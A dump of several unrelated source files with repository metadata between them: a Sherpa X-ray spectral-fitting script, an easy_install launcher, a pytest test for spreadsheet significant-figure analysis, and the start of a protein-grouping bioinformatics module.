if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(pi_file)
if binning != None:
group_counts(src_id, binning)
if plasma_model == 'mekal':
set_source(xswabs.abs1 * (xsmekal.plsm1 + xsmekal.plsm2))
if plasma_model == 'apec':
set_source(xswabs.abs1 * (xsapec.plsm1 + xsapec.plsm2))
ignore(0.0, lo_energy)
ignore(hi_energy, None)
cnts[0] = calc_data_sum(lo_energy, hi_energy) # get counts in filtered dataset
subtract()
# Check whether total counts >= min_counts.
# If so, fit; if not, skip the fit
totcnts = numpy.sum(cnts)
if totcnts >= min_counts:
if nobs_current_reg > 1:
print('\nFitting '+str(nobs_current_reg)+' spectra in region '+str(i + reg_num_to_start)+' ('+str(totcnts)+' counts total)...')
else:
print('\nFitting 1 spectrum in region '+str(i + reg_num_to_start)+' ('+str(numpy.sum(cnts))+' counts total)...')
abs1.nH = nH_Gal
if fix_nH_Gal:
freeze(abs1.nH)
else:
thaw(abs1.nH)
plsm1.kt = kT_guess
thaw(plsm1.kt)
plsm1.abundanc = Ab_guess
if fix_abund:
freeze(plsm1.abundanc)
else:
thaw(plsm1.abundanc)
plsm1.redshift = redshift
freeze(plsm1.redshift)
plsm2.kt = kT_guess
thaw(plsm2.kt)
plsm2.abundanc = Ab_guess
if fix_abund:
freeze(plsm2.abundanc)
else:
thaw(plsm2.abundanc)
link(plsm1.abundanc, plsm2.abundanc)
plsm2.redshift = redshift
freeze(plsm2.redshift)
set_method("moncar")
fit()
fit_result = get_fit_results()
red_chi2 = fit_result.rstat
num_bins = fit_result.numpoints
if fix_nH_Gal:
nH = nH_Gal
kT1 = fit_result.parvals[0]
if fix_abund:
Z1 = Ab_guess
norm1 = fit_result.parvals[1]
kT2 = fit_result.parvals[2]
norm2 = fit_result.parvals[3]
else:
Z1 = fit_result.parvals[1]
norm1 = fit_result.parvals[2]
kT2 = fit_result.parvals[3]
norm2 = fit_result.parvals[4]
else:
nH = fit_result.parvals[0]
kT1 = fit_result.parvals[1]
if fix_abund:
Z1 = Ab_guess
norm1 = fit_result.parvals[2]
kT2 = fit_result.parvals[3]
norm2 = fit_result.parvals[4]
else:
Z1 = fit_result.parvals[2]
norm1 = fit_result.parvals[3]
kT2 = fit_result.parvals[4]
norm2 = fit_result.parvals[5]
del fit_result
if find_errors:
covar()
covar_result = get_covar_results()
if fix_nH_Gal:
nH_loerr = 0.0
nH_hierr = 0.0
kT1_loerr = covar_result.parmins[0]
kT1_hierr = covar_result.parmaxes[0]
if fix_abund:
Z1_loerr = 0.0
Z1_hierr = 0.0
norm1_loerr = covar_result.parmins[1]
norm1_hierr = covar_result.parmaxes[1]
kT2_loerr = covar_result.parmins[2]
norm2_loerr = covar_result.parmins[3]
kT2_hierr = covar_result.parmaxes[2]
norm2_hierr = covar_result.parmaxes[3]
else:
Z1_loerr = covar_result.parmins[1]
norm1_loerr = covar_result.parmins[2]
kT1_hierr = covar_result.parmaxes[0]
Z1_hierr = covar_result.parmaxes[1]
norm1_hierr = covar_result.parmaxes[2]
kT2_loerr = covar_result.parmins[3]
norm2_loerr = covar_result.parmins[4]
kT2_hierr = covar_result.parmaxes[3]
norm2_hierr = covar_result.parmaxes[4]
else:
nH_loerr =covar_result.parmins[0]
nH_hierr = covar_result.parmaxes[0]
kT1_loerr = covar_result.parmins[1]
kT1_hierr = covar_result.parmaxes[1]
if fix_abund:
Z1_loerr = 0.0
Z1_hierr = 0.0
norm1_loerr = covar_result.parmins[2]
norm1_hierr = covar_result.parmaxes[2]
kT2_loerr = covar_result.parmins[3]
norm2_loerr = covar_result.parmins[4]
kT2_hierr = covar_result.parmaxes[3]
norm2_hierr = covar_result.parmaxes[4]
else:
Z1_loerr = covar_result.parmins[2]
norm1_loerr = covar_result.parmins[3]
Z1_hierr = covar_result.parmaxes[2]
norm1_hierr = covar_result.parmaxes[3]
kT2_loerr = covar_result.parmins[4]
norm2_loerr = covar_result.parmins[5]
kT2_hierr = covar_result.parmaxes[4]
norm2_hierr = covar_result.parmaxes[5]
del covar_result
# Check for failed errors (= None) and set them to +/- best-fit value
if not fix_nH_Gal:
if nH_loerr == None: nH_loerr = -nH
if nH_hierr == None: nH_hierr = nH
if kT1_loerr == None: kT1_loerr = -kT1
if kT1_hierr == None: kT1_hierr = kT1
if not fix_abund:
if Z1_loerr == None: Z1_loerr = -Z1
if Z1_hierr == None: Z1_hierr = Z1
if norm1_loerr == None: norm1_loerr = -norm1
if norm1_hierr == None: norm1_hierr = norm1
if kT2_loerr == None: kT2_loerr = -kT2
if kT2_hierr == None: kT2_hierr = kT2
if norm2_loerr == None: norm2_loerr = -norm2
if norm2_hierr == None: norm2_hierr = norm2
else:
kT1_loerr = 0.0
Z1_loerr = 0.0
nH_loerr = 0.0
norm1_loerr = 0.0
kT1_hierr = 0.0
Z1_hierr = 0.0
nH_hierr = 0.0
norm1_hierr = 0.0
kT2_loerr = 0.0
norm2_loerr = 0.0
kT2_hierr = 0.0
norm2_hierr = 0.0
else: # if total counts < min_counts, just write zeros
print('\n Warning: no fit performed for for region '+str(i + reg_num_to_start)+':')
if nobs > 1:
print(' Spectra have insufficient counts after filtering or do not exist.')
else:
print(' Spectrum has insufficient counts after filtering or does not exist.')
print(' --> All parameters for this region set to 0.0.')
kT1 = 0.0
Z1 = 0.0
nH = 0.0
norm1 = 0.0
kT2 = 0.0
norm2 = 0.0
kT1_loerr = 0.0
Z1_loerr = 0.0
nH_loerr = 0.0
norm1_loerr = 0.0
kT1_hierr = 0.0
Z1_hierr = 0.0
nH_hierr = 0.0
norm1_hierr = 0.0
kT2_loerr = 0.0
norm2_loerr = 0.0
kT2_hierr = 0.0
norm2_hierr = 0.0
red_chi2 = 0.0
num_bins = 0
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (i+reg_num_to_start, kT1, kT1_loerr, kT1_hierr, Z1, Z1_loerr, Z1_hierr, norm1, norm1_loerr, norm1_hierr, kT2, kT2_loerr, kT2_hierr, Z1, Z1_loerr, Z1_hierr, norm2, norm2_loerr, norm2_hierr, nH, nH_loerr, nH_hierr, red_chi2, totcnts, num_bins) )
results_file.close()
else:
print('\n Output file ('+fit_results_file+') exists and clobber = False.')
def call_sherpa_1T_plus_pow(spectra, redshift, nH_Gal, kT_guess, Ab_guess, plindx_guess, root, lo_energy='0.5', hi_energy='7.0', plasma_model='mekal', min_counts=100, binning=None, reg_num_to_start=0, fix_nH_Gal=True, fix_abund=False, find_errors=False, min_cnt_rate_ratio=0.3, make_plots=False, clobber=False):
"""
Calls Sherpa to fit a single-temperature-plus-power-law model to one or more spectra.
Inputs: spectra - list of input PI files. Can be a list of
lists if there is more than one observation:
e.g., [spectra_obs1, spectra_obs2], where
spectra_obs1 = ['reg1.pi, 'reg2.pi', ...]
redshift - redshift of source
nH_Gal - Galactic N_H (10^22 cm^-2)
kT_guess - initial guess for temperature (keV)
Ab_guess - initial guess for abundance
plindx_guess - intial guess for the power-law index
root - root of output file with fit results
lo_energy - lower bound of fitted energy range (keV)
hi_energy - upper bound of fitted energy range (keV)
plasma_model - specifies the plasma model (mekal or apec)
min_counts - minimum number of total counts required for
fitting
binning - number of counts per bin for fitting
reg_num_to_start - number to start from when numbering the
fit results by region
fix_nH_Gal - if True, freezes nH_Gal
fix_abund - if True, freezes abundance
find_errors - if True, calculates errors
make_plots - if True, make a plot of fit for each region
min_cnt_rate_ratio - min ratio (relative to max cnt rate
in region) below which to discard
observations
clobber - if True, overwrite existing file
Outputs: The fits results are saved to the file:
root+'_wabs_'+plasma_model+'_pow.dat'
"""
if isinstance(spectra, str): spectra = [spectra]
if isinstance(spectra[0], str):
nreg = 1 # number of regions
else:
nreg = len(spectra[0]) # number of regions
nobs = len(spectra) # number of observations
fit_results_file = root + '_wabs_' + plasma_model + '_pow.dat'
ccolor = ["blue", "gold", "cyan", "forest", "darkred", "red", "gray", "green", "magenta", "orange", "black", "yellow", "turquoise", "firebrick", "brown", "azure", "honeydew", "lime", "mistyrose", "navy"]
if type(redshift) == str: redshift = float(redshift)
if type(nH_Gal) == str: nH_Gal = float(nH_Gal)
if type(kT_guess) == str: kT_guess = float(kT_guess)
if type(Ab_guess) == str: Ab_guess = float(Ab_guess)
if type(plindx_guess) == str: plindx_guess = float(plindx_guess)
if type(lo_energy) == str: lo_energy = float(lo_energy)
if type(hi_energy) == str: hi_energy = float(hi_energy)
if os.path.isfile(fit_results_file) == False or clobber == True:
results_file = open(fit_results_file, "w")
results_file.write('# Fit results for wabs*'+plasma_model+' (zeros indicate that no fitting was performed)\n')
results_file.write('# Reg_no. kT kT_loerr kT_hierr Z Z_loerr Z_hierr norm norm_loerr norm_hierr plindx indx_loerr indx_hierr plnorm plnorm_loerr plnorm_hierr nH_Gal nH_loerr nH_hierr red_chisq total_counts num_bins\n')
for i in range(nreg):
print('\n')
clean() # reset everything
gc.collect() # collect garbage every step to avoid memory problems when fitting a large number (>10) of observations simultaneously
nobs_current_reg = 0 # number of valid spectra for this region
good_src_ids = numpy.zeros(nobs, dtype=int) - 1
if nobs > 1:
cnts = numpy.zeros(nobs) # array to store counts
max_rate = numpy.zeros(nobs) # max count rate [counts/s/keV]
src_id = 0 # index of source id
for j in range(nobs):
pi_file = spectra[j][i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(src_id, pi_file)
if binning != None:
print('Grouping to ' + str(binning) + ' counts...')
group_counts(src_id, binning)
ignore_id(src_id, 0.0, lo_energy)
ignore_id(src_id, hi_energy, None)
cnts[j] = calc_data_sum(lo_energy, hi_energy, src_id) # get counts in filtered dataset
print('Counts for obs '+str(j+1)+': '+str(int(cnts[j])))
cnt_rate = get_rate(src_id, filter=True)
if len(cnt_rate) == 0: # when few counts (<50), get_rate can return zero-length array
max_rate[j] = 0.0
else:
max_rate[j] = numpy.max(cnt_rate)
subtract(src_id) # subtract the background
if src_id == 0:
if plasma_model == 'mekal':
set_source(src_id, xswabs.abs1 * (xsmekal.plsm1 + xspowerlaw.pow1))
if plasma_model == 'apec':
set_source(src_id, xswabs.abs1 * (xsapec.plsm1 + xspowerlaw.pow1))
else:
set_source(src_id, abs1 * (plsm1 + pow1))
good_src_ids[j] = src_id
src_id += 1
# Filter out ignored observations
good_src_ids_indx = numpy.where(good_src_ids >= 0)
good_src_ids = good_src_ids[good_src_ids_indx]
max_rate = max_rate[good_src_ids_indx]
cnts = cnts[good_src_ids_indx]
# If min_cnt_rate_ratio is specified, check whether the count rate
# of any observation falls below the limit.
if min_cnt_rate_ratio != None:
max_rate_overall = numpy.max(max_rate)
max_rate_ratios = max_rate / max_rate_overall
lowcr_src_ids_indx = numpy.where(max_rate_ratios < min_cnt_rate_ratio)
highcr_src_ids_indx = numpy.where(max_rate_ratios >= min_cnt_rate_ratio)
if len(lowcr_src_ids_indx) > 0:
lowcr_src_ids = good_src_ids[lowcr_src_ids_indx]
good_src_ids = good_src_ids[highcr_src_ids_indx]
cnts = cnts[highcr_src_ids_indx]
for b in range(len(lowcr_src_ids)):
print('Removing observation '+str(lowcr_src_ids[b]+1)+' (dataset '+str(lowcr_src_ids[b])+') for low count rate.')
delete_data(lowcr_src_ids[b])
nobs_current_reg -= 1
if nobs == 1:
pi_file = spectra[i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(pi_file)
if binning != None:
group_counts(src_id, binning)
if plasma_model == 'mekal':
set_source(xswabs.abs1 * (xsmekal.plsm1 + xspowerlaw.pow1))
if plasma_model == 'apec':
set_source(xswabs.abs1 * (xsapec.plsm1 + xspowerlaw.pow1))
ignore(0.0, lo_energy)
ignore(hi_energy, None)
cnts[0] = calc_data_sum(lo_energy, hi_energy) # get counts in filtered dataset
subtract()
# Check whether total counts >= min_counts.
# If so, fit; if not, skip the fit
totcnts = numpy.sum(cnts)
if totcnts >= min_counts:
if nobs_current_reg > 1:
print('\nFitting '+str(nobs_current_reg)+' spectra in region '+str(i + reg_num_to_start)+' ('+str(totcnts)+' counts total)...')
else:
print('\nFitting 1 spectrum in region '+str(i + reg_num_to_start)+' ('+str(numpy.sum(cnts))+' counts total)...')
abs1.nH = nH_Gal
if fix_nH_Gal:
freeze(abs1.nH)
else:
thaw(abs1.nH)
plsm1.kt = kT_guess
thaw(plsm1.kt)
plsm1.abundanc = Ab_guess
thaw(plsm1.abundanc)
plsm1.redshift = redshift
freeze(plsm1.redshift)
pow1.PhoIndex = plindx_guess
set_method("moncar")
fit()
fit_result = get_fit_results()
red_chi2 = fit_result.rstat
num_bins = fit_result.numpoints
if fix_nH_Gal:
nH = nH_Gal
kT = fit_result.parvals[0]
Z = fit_result.parvals[1]
norm = fit_result.parvals[2]
powindx = fit_result.parvals[3]
pownorm = fit_result.parvals[4]
else:
nH = fit_result.parvals[0]
kT = fit_result.parvals[1]
Z = fit_result.parvals[2]
norm = fit_result.parvals[3]
powindx = fit_result.parvals[4]
pownorm = fit_result.parvals[5]
del fit_result
if make_plots:
if len(good_src_ids) > 10:
nplots = numpy.ceil(len(good_src_ids) / 10.0)
else:
nplots = 1
for plot_num in range(nplots):
start_indx = 0 + numpy.floor(len(good_src_ids) / nplots) * plot_num
if plot_num == nplots - 1:
end_indx = len(good_src_ids)
else:
end_indx = numpy.floor(len(good_src_ids) / nplots) * (plot_num + 1.0)
clear() # delete any plot windows
add_window()
#add_window(["display", False])
set_preference("frame.transparency", "true")
#set_preference("window.display", "false")
label_ypos = 0.2
ccolor_indx = 0
for p in good_src_ids[start_indx:end_indx]:
plot_fit_delchi(p, overplot=True, clearwindow=False)
log_scale(X_AXIS)
set_current_plot("plot1")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, 1E-7, 0.2)
log_scale(Y_AXIS)
set_curve("crv1", ["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_curve("crv2", ["line.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
label_ypos = label_ypos / 2.0
add_label(4.0, label_ypos, "obs"+str(p+1))
set_label(["color", ccolor[ccolor_indx]])
set_current_plot("plot2")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, -5.0, 5.0)
set_curve(["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_plot_xlabel("Energy (keV)")
set_plot_ylabel("Sigma")
ccolor_indx += 1
set_current_plot("plot1")
set_plot_title("Fit for region "+str(i+reg_num_to_start))
set_plot_ylabel("Counts s^{-1} keV^{-1}")
if nplots > 1:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_plot" + str(plot_num) + "_1T+pow_fit.pdf"
else:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_1T+pow_fit.pdf"
print_window(fit_plot_file, ["orientation", "portrait", "clobber", True])
if find_errors:
covar()
covar_result = get_covar_results()
if fix_nH_Gal:
nH_loerr = 0.0
nH_hierr = 0.0
kT_loerr = covar_result.parmins[0]
Z_loerr = covar_result.parmins[1]
norm_loerr = covar_result.parmins[2]
powindx_loerr = covar_result.parmins[3]
pownorm_loerr = covar_result.parmins[4]
kT_hierr = covar_result.parmaxes[0]
Z_hierr = covar_result.parmaxes[1]
norm_hierr = covar_result.parmaxes[2]
powindx_hierr = covar_result.parmaxes[3]
pownorm_hierr = covar_result.parmaxes[4]
else:
nH_loerr =covar_result.parmins[0]
kT_loerr = covar_result.parmins[1]
Z_loerr = covar_result.parmins[2]
norm_loerr = covar_result.parmins[3]
powindx_loerr = covar_result.parmins[4]
pownorm_loerr = covar_result.parmins[5]
nH_hierr = covar_result.parmaxes[0]
kT_hierr = covar_result.parmaxes[1]
Z_hierr = covar_result.parmaxes[2]
norm_hierr = covar_result.parmaxes[3]
powindx_hierr = covar_result.parmaxes[4]
pownorm_hierr = covar_result.parmaxes[5]
del covar_result
# Check for failed errors (= None) and set them to +/- best-fit value
if not fix_nH_Gal:
if nH_loerr == None: nH_loerr = -nH
if nH_hierr == None: nH_hierr = nH
if kT_loerr == None: kT_loerr = -kT
if kT_hierr == None: kT_hierr = kT
if Z_loerr == None: Z_loerr = -Z
if Z_hierr == None: Z_hierr = Z
if norm_loerr == None: norm_loerr = -norm
if norm_hierr == None: norm_hierr = norm
if powindx_loerr == None: powindx_loerr = -powindx
if powindx_hierr == None: powindx_hierr = powindx
if pownorm_loerr == None: pownorm_loerr = -pownorm
if pownorm_hierr == None: pownorm_hierr = pownorm
else:
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
powindx_loerr = 0.0
pownorm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
powindx_hierr = 0.0
pownorm_hierr = 0.0
else: # if total counts < min_counts, just write zeros
print('\n Warning: no fit performed for for region '+str(i + reg_num_to_start)+':')
if nobs > 1:
print(' Spectra have insufficient counts after filtering or do not exist.')
else:
print(' Spectrum has insufficient counts after filtering or does not exist.')
print(' --> All parameters for this region set to 0.0.')
kT = 0.0
Z = 0.0
nH = 0.0
norm = 0.0
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
powindx_loerr = 0.0
pownorm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
powindx_hierr = 0.0
pownorm_hierr = 0.0
red_chi2 = 0.0
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (i+reg_num_to_start, kT, kT_loerr, kT_hierr, Z, Z_loerr, Z_hierr, norm, norm_loerr, norm_hierr, powindx, powindx_loerr, powindx_hierr, pownorm, pownorm_loerr, pownorm_hierr, nH, nH_loerr, nH_hierr, red_chi2, totcnts, num_bins) )
results_file.close()
# Finally, make sure all regions have an entry in the fit results file
# (this shouldn't be needed, but just in case...)
dtype = {'names': ('reg_id', 'kT', 'kT_lo', 'kT_hi', 'Z', 'Z_lo', 'Z_hi', 'norm', 'norm_lo', 'norm_hi', 'plindx', 'plindx_lo', 'plindx_hi', 'plnorm', 'plnorm_lo', 'plnorm_hi', 'nH', 'nH_lo', 'nH_hi', 'chi2', 'totcnts', 'nbins'), 'formats': ('i4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'i4')}
data = numpy.loadtxt(fit_results_file, dtype=dtype)
reg_num = data["reg_id"]
missing_regs = []
n_missing = 0
for i in range(len(reg_num)):
if int(reg_num[i]) != i + reg_num_to_start + n_missing:
missing_regs.append(i + reg_num_to_start + n_missing)
n_missing += 1
if n_missing > 0:
results_file = open(fit_results_file, "a") # append missing regions
for i in range(n_missing):
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (missing_regs[i]+reg_num_to_start, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0) )
else:
print('\n Output file ('+fit_results_file+') exists and clobber = False.')
if __name__=='__main__':
from optparse import OptionParser
parser = OptionParser(usage='%prog [options] <spectra_list> <redshift> <nH_Gal> <kT_guess> <Ab_guess> <root>\n\nArguments:\n <spectra_list> input PI file (may be list; if so, prepend filename with "@")\n <redshift> redshift of source\n <nH_Gal> Galactic N_H (10^22 cm^-2)\n <kT_guess> initial guess for temperature\n <Ab_guess> initial guess for abundance\n <root> root of output file containing fit results', version="%prog 0.55")
parser.add_option('--lo_energy', dest='lo_energy', help='lower energy bound for fit (keV); default = 0.5', metavar='VAL', default='0.5')
parser.add_option('--hi_energy', dest='hi_energy', help='upper energy bound for fit (keV); default = 7.0', metavar='VAL', default='7.0')
parser.add_option('--plasma_model', dest='plasma_model', help='plasma model to use in fit (mekal or apec); default = mekal', metavar='VAL', default='mekal')
parser.add_option('--fix_nh', dest='fix_nH', help='Freeze nH; default = True', metavar='VAL', default=True)
parser.add_option('--fix_abund', dest='fix_abund', help='Freeze abundance; default = False', metavar='VAL', default=False)
parser.add_option('-c', action='store_true', dest='clobber', help='clobber any existing files', default=False)
(options, args) = parser.parse_args()
if len(args) == 6:
spectra_list = args[0]
redshift = args[1]
nH_Gal = args[2]
kT_guess = args[3]
Ab_guess = args[4]
root = args[5]
lo_energy = options.lo_energy
hi_energy = options.hi_energy
plasma_model = options.plasma_model
fix_nH_Gal = options.fix_nH
fix_abund = options.fix_abund
clobber = options.clobber
# Read spectra file names from the spectra_list if it begins with '@'
if spectra_list[0] == '@':
spectra_list_file = open(spectra_list[1:], "r")
spectra_list = spectra_list_file.readlines()
spectra_list_file.close()
for i in range(len(spectra_list)): spectra_list[i] = spectra_list[i].rstrip() # trim newlines
else:
if len(spectra_list) == 1: spectra_list = [spectra_list]
# Call Sherpa
call_sherpa_1T(spectra_list, redshift, nH_Gal, kT_guess, Ab_guess, root, lo_energy=lo_energy, hi_energy=hi_energy, plasma_model=plasma_model, fix_nH_Gal=fix_nH_Gal, fix_abund=fix_abund, clobber=clobber)
else:
parser.print_help()
|
[
"drafferty@hs.uni-hamburg.de"
] |
drafferty@hs.uni-hamburg.de
|
e756a6abde824ff3cc7b491d79f58b05aca71f54
|
a6fbb304c09196efb9b1a613e2a91aab2bb2515a
|
/venv/bin/easy_install
|
cf1380709195f37ebc1110e87751caf07df9618c
|
[] |
no_license
|
ShipDandy/jojosBazaar
|
6c1a6cebcad455a5dfa4c217726ddc79fc3333cd
|
c2746595342cb041bb18533bb803a38cfd85b264
|
refs/heads/master
| 2021-05-14T17:38:23.424991
| 2019-03-22T15:56:59
| 2019-03-22T15:56:59
| 116,050,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
#!/Users/zyoosun/Documents/WorkProjects/customStore/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"zyoosun@gmail.com"
] |
zyoosun@gmail.com
|
|
61f1e5d0668f7b160cceab9f1e4404c708073cc9
|
52288a1d0d828f0eb5843b7a9d3e88ec76c1f17b
|
/python/tests/xlsx_info_test.py
|
48412905d1d6633ab47226761f0da044378d9523
|
[] |
no_license
|
uscensusbureau/drb_rounder
|
9e2df83364ce5f5b1e4ea1ee53484d2ed5181e00
|
6e56e6cddb811ae081873fc4383845421aa470b1
|
refs/heads/master
| 2020-03-28T02:29:13.169725
| 2018-08-24T04:24:51
| 2018-08-24T04:24:51
| 147,573,770
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,741
|
py
|
#!/usr/bin/env python3
import pytest
import os
import os.path
from common import TEST_FILES_DIR
from latex_tools import run_latex
from xlsx_info import *
from tytable import HTML, TEXT, LATEX
import subprocess
import shutil
WORK2_DIR = os.path.join( os.path.dirname(__file__), "work2")
XLSX_PATH = os.path.join( TEST_FILES_DIR, "spreadsheet.xlsx")
SPREADSHEET_XLSX=os.path.join(WORK2_DIR, os.path.basename(XLSX_PATH))
SPREADSHEET_TEX=os.path.join(WORK2_DIR, os.path.basename(XLSX_PATH)).replace(".xlsx",".tex")
SPREADSHEET_TXT=os.path.join(WORK2_DIR, os.path.basename(XLSX_PATH)).replace(".xlsx",".txt")
def rm_Rf(workdir):
# Clear out the workdir
if os.path.exists(workdir):
for (root,dirs,files) in os.walk(workdir,topdown=False):
for fn in files:
os.unlink(os.path.join(root,fn))
for d in dirs:
os.rmdir(os.path.join(root,d))
os.rmdir(workdir)
def make_workdir(workdir):
rm_Rf(WORK_DIR)
os.mkdir(WORK_DIR)
# copy the files over
for fn in os.listdir(WEEKLY_TEST_DIR):
# Do not copy over files beginning with '.'
if fn[0]=='.':
continue
fnpath = os.path.join(WEEKLY_TEST_DIR,fn)
shutil.copy(fnpath,WORK_DIR)
def test_find_sigfigs():
assert SigFigStats.find_sigfigs(0) == 0
assert SigFigStats.find_sigfigs(1) == 1
assert SigFigStats.find_sigfigs(2) == 1
assert SigFigStats.find_sigfigs(1.1) == 2
assert SigFigStats.find_sigfigs(1.23) == 3
assert SigFigStats.find_sigfigs(12.3) == 3
assert SigFigStats.find_sigfigs(123.) == 3
assert SigFigStats.find_sigfigs("0") == 0
assert SigFigStats.find_sigfigs("1") == 1
assert SigFigStats.find_sigfigs("2") == 1
assert SigFigStats.find_sigfigs("1.1") == 2
assert SigFigStats.find_sigfigs("1.23") == 3
assert SigFigStats.find_sigfigs("12.3") == 3
assert SigFigStats.find_sigfigs("123.") == 3
def test_analyze_xlsx():
""" This just test to make sure that the LaTeX file created can be processed."""
assert SPREADSHEET_TEX != SPREADSHEET_TXT
rm_Rf(WORK2_DIR)
os.mkdir(WORK2_DIR)
shutil.copy(XLSX_PATH, WORK2_DIR)
print("==>",SPREADSHEET_TEX, SPREADSHEET_TXT)
with open(SPREADSHEET_TEX,"w") as f:
f.write("\\documentclass{article}\\begin{document}\n")
f.write( analyze_xlsx( filename=SPREADSHEET_XLSX, mode=LATEX))
f.write("\\end{document}\n")
with open(SPREADSHEET_TXT,"w") as f:
f.write( analyze_xlsx( filename=SPREADSHEET_XLSX, mode=TEXT))
run_latex(SPREADSHEET_TEX, repeat=1)
if __name__=="__main__":
test_analyze_xlsx()
ret = subprocess.call([sys.executable,'make_combined_file.py',WORK_DIR])
assert ret==0
|
[
"simson.l.garfinkel@census.gov"
] |
simson.l.garfinkel@census.gov
|
d52bb3601e2eadbe52c4443c22c3d81cbac3450f
|
c2c4716d5bc35c9fad65bee79d5575bea06d371b
|
/dark/civ/proteins.py
|
8d4563cbfdb1e802cc4ca3c1d92f34dbaccce984
|
[
"MIT"
] |
permissive
|
terrycojones/dark-matter
|
776807bce788fd3354f7e125f176e5affc4693eb
|
67d16f870db6b4239e17e542bc6e3f072dc29c75
|
refs/heads/master
| 2023-05-10T21:26:44.977749
| 2021-08-17T15:18:12
| 2021-08-17T15:18:12
| 23,939,945
| 1
| 0
| null | 2014-12-02T22:12:02
| 2014-09-11T23:44:49
|
Python
|
UTF-8
|
Python
| false
| false
| 101,824
|
py
|
from __future__ import print_function
import os
import re
import sqlite3
import sys
import numpy as np
from Bio import SeqIO
from cachetools import LRUCache, cachedmethod
from collections import defaultdict
from functools import partial
from json import load
from operator import attrgetter, itemgetter
from os.path import dirname, exists, join
from six import string_types
from six.moves.urllib.parse import quote
from textwrap import fill
from warnings import warn
from dark.dimension import dimensionalIterator
from dark.errors import DatabaseDuplicationError
from dark.fasta import FastaReads
from dark.fastq import FastqReads
from dark.filter import TitleFilter
from dark.genbank import GenomeRanges
from dark.html import NCBISequenceLinkURL, NCBISequenceLink
from dark.reads import Reads
from dark.taxonomy import (
# isDNAVirus, isRNAVirus, formatLineage,
lineageTaxonomyLinks, Hierarchy,
LineageElement)
class PathogenSampleFiles(object):
"""
Maintain a cache of FASTA/FASTQ file names for the samples that contain a
given pathogen, create de-duplicated (by read id) FASTA/FASTQ files
for each pathogen/sample pair, provide functions to write out index files
of samples numbers (which are generated here in C{self.add}),
and provide a filename lookup function for pathogen/sample combinations
or just pathogen accessions by themselves.
@param proteinGrouper: An instance of C{ProteinGrouper}.
@param format_: A C{str}, either 'fasta' or 'fastq' indicating the format
of the files containing the reads matching proteins.
@raise ValueError: If C{format_} is unknown.
"""
def __init__(self, proteinGrouper, format_='fasta'):
self._proteinGrouper = proteinGrouper
if format_ in ('fasta', 'fastq'):
self._format = format_
self._readsClass = FastaReads if format_ == 'fasta' else FastqReads
else:
raise ValueError("format_ must be either 'fasta' or 'fastq'.")
self._pathogens = {}
self._samples = {}
self._readsFilenames = {}
def add(self, genomeAccession, sampleName):
"""
